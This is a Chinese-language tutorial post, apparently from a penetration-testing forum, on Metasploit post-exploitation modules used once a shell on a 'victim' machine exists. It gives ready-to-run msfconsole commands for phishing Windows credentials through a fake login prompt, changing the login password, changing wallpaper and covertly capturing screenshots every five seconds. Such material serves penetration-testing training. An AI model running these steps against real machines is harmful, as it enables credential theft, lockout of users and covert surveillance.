|
[md]>一旦受害者机器必须被测试者入侵,测试者可以使用msf后期利用模块来收集有关受害者的信息或证据。metasploit 框架中有478 个后期开发模块可用,在 post 模块的帮助下,让后期的渗透会变得更有趣。
本文将为你介绍常用的几个post模块的使用,感兴趣就收藏吧!
如下,当我们成功得到系统的shell后,便可以建立有趣的post模块 了。
![][1]
### Windows凭据认证
当我们无法得到系统管理员的密码时,可以利用此模块用于通过弹出登录提示框,对目标机器进行认证测试。当受害者在登录提示中填写凭据时,凭据将发送给测试者。
要执行此测试,您需要执行以下命令。
```
use post/windows/gather/phish_windows_credentials
set session 1
run
```
效果如下所示:
![][2]
当用户输入密码信息后
![][3]
### 修改桌面壁纸
该模块将授予您更改受害机器桌面壁纸的权限。
在继续之前,我们必须有 PNG 或 JPEG 格式的图像。之后,我们需要执行这些命令,如下所示。
```
use post/multi/manage/set_wallpaper
set session 4
set wallpaper_file /home/shubham/Desktop/1.png
run
```
只要我们执行这个模块,受害者的桌面壁纸就会成功改变。
### 更改密码
本模块将帮助我们更改目标机器的窗口登录密码。
在 `multi/handler` 上执行这些给定的命令来执行测试。
注意:要执行此测试,我们必须具有管理员权限。
```
use windows/manage/change_password
set session 4
set old_password 123456789
set new_password 12345678
set smbuser hp
run
```
修改后,用旧密码便无法成功登录系统。
![](data/attachment/forum/202208/19/095321yo04v4ntztitfoz1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "15.png")
### Windows 屏幕收集
在这个模块中,测试者可以匿名获取受害者机器的桌面截图。
您需要在 multi/handler 上输入这些给定的命令。
```
use post/windows/gather/screen_spy
set session 10
set view_screenshots true
run
```
执行完后,我们会每5s得到一张桌面截图。
![][5]
[1]: https://blog.bbskali.cn/usr/uploads/2022/08/3186014065.png
[2]: https://blog.bbskali.cn/usr/uploads/2022/08/2047144461.png
[3]: https://blog.bbskali.cn/usr/uploads/2022/08/617134603.png
[4]: https://blog.bbskali.cn/usr/uploads/2022/08/1504089203.png
[5]: https://blog.bbskali.cn/usr/uploads/2022/08/1510962901.png
[/md] |
|
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
|
|
|
|
|